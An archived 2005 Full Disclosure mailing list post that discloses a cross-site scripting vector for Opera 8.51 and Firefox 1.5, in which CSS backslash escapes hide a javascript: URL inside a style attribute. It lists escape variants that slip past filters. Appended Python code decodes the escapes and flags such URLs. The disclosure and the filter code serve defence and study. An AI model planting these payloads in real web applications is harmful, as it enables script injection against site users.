Full Disclosure mailing list archives
Opera/8.51 Firefox/1.5 XSS attacking vector
From: hoshikuzu stardust <st4rdust () gmail com>
Date: Sat, 3 Dec 2005 01:15:31 +0900
Hello full-disclosure.

Sample:
<anytag style="background:url("javascri\Dpt:/*/**/(function a() {alert('JavaScript is executed.')})();");" />

Affected Web browsers are `Opera Version 8.51` and `Firefox/1.5`. (Tested on Windows XP Service Pack 2.)

Variant: "\d" "\D" "\0d" "\00000d" "\d " "\00000d " "\a" "\9" etc.

(Maybe we must check out \7 via IE on Mac (a.k.a. BELL on Mac); I do not have a Mac.)

If your web application does not sanitize output it is very easy to inject malicious scripts.

Is it well-known information? Sorry.

BEST REGARDS.
--
hoshikuzu | star_dust
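A defensive check for the filter bypass described in this post, as an added example that is not part of the original message: it decodes CSS backslash escapes and drops control characters before looking for a `javascript:` scheme in a style value. The function names and the sample strings (which use a harmless `void(0)` body) are constructed for illustration.

```python
import re

# CSS escape: backslash + 1-6 hex digits + one optional whitespace
# terminator (CRLF counts as one), or backslash + any other character.
_CSS_ESCAPE = re.compile(
    r"\\(?:([0-9a-fA-F]{1,6})(?:\r\n|[ \t\r\n\f])?|(.))", re.DOTALL)
# C0 controls, space and DEL. Dropping the space as well is deliberately
# conservative: a filter may over-match, it must not under-match.
_STRIP = re.compile(r"[\x00-\x20\x7f]")

# Escape variants listed in the post.
VARIANTS = ["\\d", "\\D", "\\0d", "\\00000d", "\\d ", "\\00000d ", "\\a", "\\9"]


def sample(variant: str) -> str:
    """Constructed test input: the post's pattern with a harmless body."""
    return 'background:url("javascri' + variant + 'pt:void(0)")'


def css_unescape(value: str) -> str:
    """Decode CSS backslash escapes following the CSS escape grammar."""
    def repl(m: re.Match) -> str:
        if m.group(1) is None:
            # Escaped newline is a line continuation; else the literal char.
            return "" if m.group(2) in "\r\n\f" else m.group(2)
        cp = int(m.group(1), 16)
        if cp == 0 or cp > 0x10FFFF or 0xD800 <= cp <= 0xDFFF:
            return "\ufffd"
        return chr(cp)
    return _CSS_ESCAPE.sub(repl, value)


def naive_check(style: str) -> bool:
    """Substring filter on the raw value; the escapes defeat it."""
    return "javascript:" in style.lower()


def style_has_script_url(style: str) -> bool:
    """Decode escapes, drop control characters, then look for the scheme."""
    canonical = _STRIP.sub("", css_unescape(style)).lower()
    return "javascript:" in canonical


if __name__ == "__main__":
    for v in VARIANTS:
        s = sample(v)
        print(f"{v!r:12} naive={naive_check(s)} decoded={style_has_script_url(s)}")
```

Matching one scheme after decoding shows why the raw-string filter fails; an allowlist of CSS properties and URL schemes applied to the decoded value is the more robust design.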